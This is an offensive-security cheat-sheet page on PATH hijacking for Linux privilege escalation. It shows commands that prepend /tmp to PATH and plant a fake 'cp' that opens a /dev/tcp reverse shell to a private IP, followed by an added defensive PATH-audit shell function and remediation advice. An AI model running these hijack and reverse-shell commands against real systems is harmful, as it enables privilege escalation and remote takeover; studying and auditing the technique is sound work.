>_ shadow.red

PATH Hijacking


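When a SUID or root-run binary invokes another program by name (e.g. cp) rather than by absolute path, the name is resolved through PATH. Prepending a writable directory to PATH makes a file of the same name in that directory resolve first.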

Inspect and override PATH

echo $PATH
export PATH=/tmp:$PATH
echo $PATH

Plant a malicious binary

echo 'bash -c "exec bash -i &>/dev/tcp/10.4.10.4/4444 <&1"' > /tmp/cp
chmod +x /tmp/cp

Then trigger the privileged binary that calls cp.

Generic shell stub for path hijacking

#!/bin/bash
bash -i
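
A defensive check for the condition this page relies on, as an added example that is not part of the original page: it walks a PATH value in lookup order and reports every entry that is empty, relative, or group/world-writable ahead of the directory that actually provides the command. The function name path_hijack_audit and its output format are assumptions made for this example.

```shell
#!/bin/sh
# Added example (hypothetical helper, not from the original page).
# path_hijack_audit NAME PATHVALUE
# Walk PATHVALUE in lookup order until NAME is found and print every entry
# in which a non-root user could plant a file called NAME.
# Exit status: 1 if any risky entry was seen, 0 otherwise.
# Limitation: only mode bits are checked, not directory ownership or ACLs.
path_hijack_audit() (
    name=$1
    rest="$2:"            # trailing ':' lets the loop see the last entry
    status=0
    while [ -n "$rest" ]; do
        dir=${rest%%:*}   # next entry
        rest=${rest#*:}   # remainder after it
        reason=
        case $dir in
            '')  reason='empty entry means current directory' ;;
            /*)  if [ -d "$dir" ]; then
                     # -L follows symlinks; keep only the 10-char mode string
                     mode=$(ls -ldL "$dir" | cut -c1-10)
                     case $mode in
                         ????????w?) reason='world-writable' ;;
                         ?????w????) reason='group-writable' ;;
                     esac
                 fi ;;
            *)   reason='relative entry' ;;
        esac
        if [ -n "$reason" ]; then
            printf 'RISK %s (%s)\n' "${dir:-<empty>}" "$reason"
            status=1
        fi
        # Stop at the first directory that provides an executable NAME,
        # because the lookup never reaches the entries after it.
        if [ -n "$dir" ] && [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            printf 'RESOLVES %s/%s\n' "$dir" "$name"
            break
        fi
    done
    exit "$status"
)
```

For SUID programs the caller supplies PATH, so the fix there belongs in the binary itself (absolute paths or a reset PATH). This audit applies to PATH values configured for root contexts such as cron jobs and service units.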